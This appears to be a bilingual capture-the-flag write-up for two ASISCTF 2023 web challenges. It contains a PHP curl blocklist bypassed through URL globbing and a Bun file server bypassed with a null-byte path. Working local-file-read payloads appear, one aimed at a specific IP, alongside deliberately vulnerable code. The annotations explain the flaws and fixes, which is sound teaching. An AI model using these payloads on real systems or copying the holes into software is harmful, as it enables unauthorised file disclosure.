2023/09/28:ASISCTF

https://hackmd.io/@parrot409/H1VJQZEep

hello

<?php
/*
Flag is at /flag.txt
Hint for beginners: read curl's manpage.
*/
// Challenge source: shows this file, then fetches a user-chosen URL with curl.
highlight_file(__FILE__);
// Default target used when no acceptable ?x= parameter is supplied.
$url = 'file:///hi.txt';
// Blocklist: the ?x= value is accepted only if its lowercased form contains
// neither "file" nor "flag". This is a plain substring test on the literal
// parameter; it says nothing about how curl will later interpret the string.
if(
array_key_exists('x', $_GET) &&
!str_contains(strtolower($_GET['x']),'file') &&
!str_contains(strtolower($_GET['x']),'flag')
){
$url = $_GET['x'];
}
// escapeshellarg() only guards the shell boundary (no command injection).
// curl still receives the URL verbatim and applies its own URL globbing, so a
// bracket range such as "[a-z]" is expanded by curl into many URLs - among
// them ones containing the very substrings the check above rejected (the
// payload below relies on this). A defensive version would allowlist the
// scheme/host instead of blocklisting substrings and pass --globoff (-g)
// to curl so bracket/brace expansion is disabled.
system('curl '.escapeshellarg($url));

提示：利用通配符（curl 的 URL globbing）绕过过滤
http://45.147.231.180:8000/?x=fil[a-z:1]:///[a-z]ext.txt

const fs = require('node:fs');
const path = require('path')

/*
I wonder what is inside /next.txt
*/

// Path prefix a client must know to reach the file-read route. Only a
// startsWith() comparison is done on it below.
const secret = '39c8e9953fe8ea40ff1c59876e0e2f28'
// Challenge HTTP server (Bun runtime). Under the secret prefix it serves the
// base64 of an arbitrary local file, unless the file's basename contains "next".
const server = Bun.serve({
port: 8000,
fetch(req) {
let url = new URL(req.url);
let pname = url.pathname;
if(pname.startsWith(`/${secret}`)){
if(pname.startsWith(`/${secret}/read`)){
try{
// Untrusted path taken verbatim from ?file=. It is null when the parameter
// is absent; path.basename(null) is then expected to throw, and the empty
// catch below discards that.
let fpath = url.searchParams.get('file');
// Blocklist is applied to the basename only, i.e. the text after the last
// "/" - no normalisation and no null-byte check (see the note below the
// listing). A value like "/next.js\0/." has basename ".", passes here, and
// is handed unchanged to readFileSync. A robust check would path.resolve()
// the value, reject any "\0", and require it to stay inside an allowlisted
// directory.
if(path.basename(fpath).indexOf('next') == -1){
// Whole file, base64-encoded; no size limit, any readable file.
return new Response(fs.readFileSync(fpath).toString('base64'));
} else {
return new Response('no way');
}
// Every error (missing param, ENOENT, EACCES, ...) is swallowed silently.
} catch(e){ }
return new Response("Couldn't read your file :(");
}
// Any other path under the secret prefix gets the usage hint.
return new Response(`did you know i can read files?? amazing right,,, maybe try /${secret}/read/?file=/proc/self/cmdline`);
}
// Paths outside the secret prefix get no Response object (undefined).
return
}
});

使用 `?file=/next.js%00/.` 绕过：
path.basename 只执行 path.slice(lastIndexOfSlash+1)，得到的 basename 是 `.`，不含 `next`，因此通过检查；而（Bun 下的）fs.readFileSync 不检查空字节，路径在 `\0` 处被截断，实际读取的是 /next.js。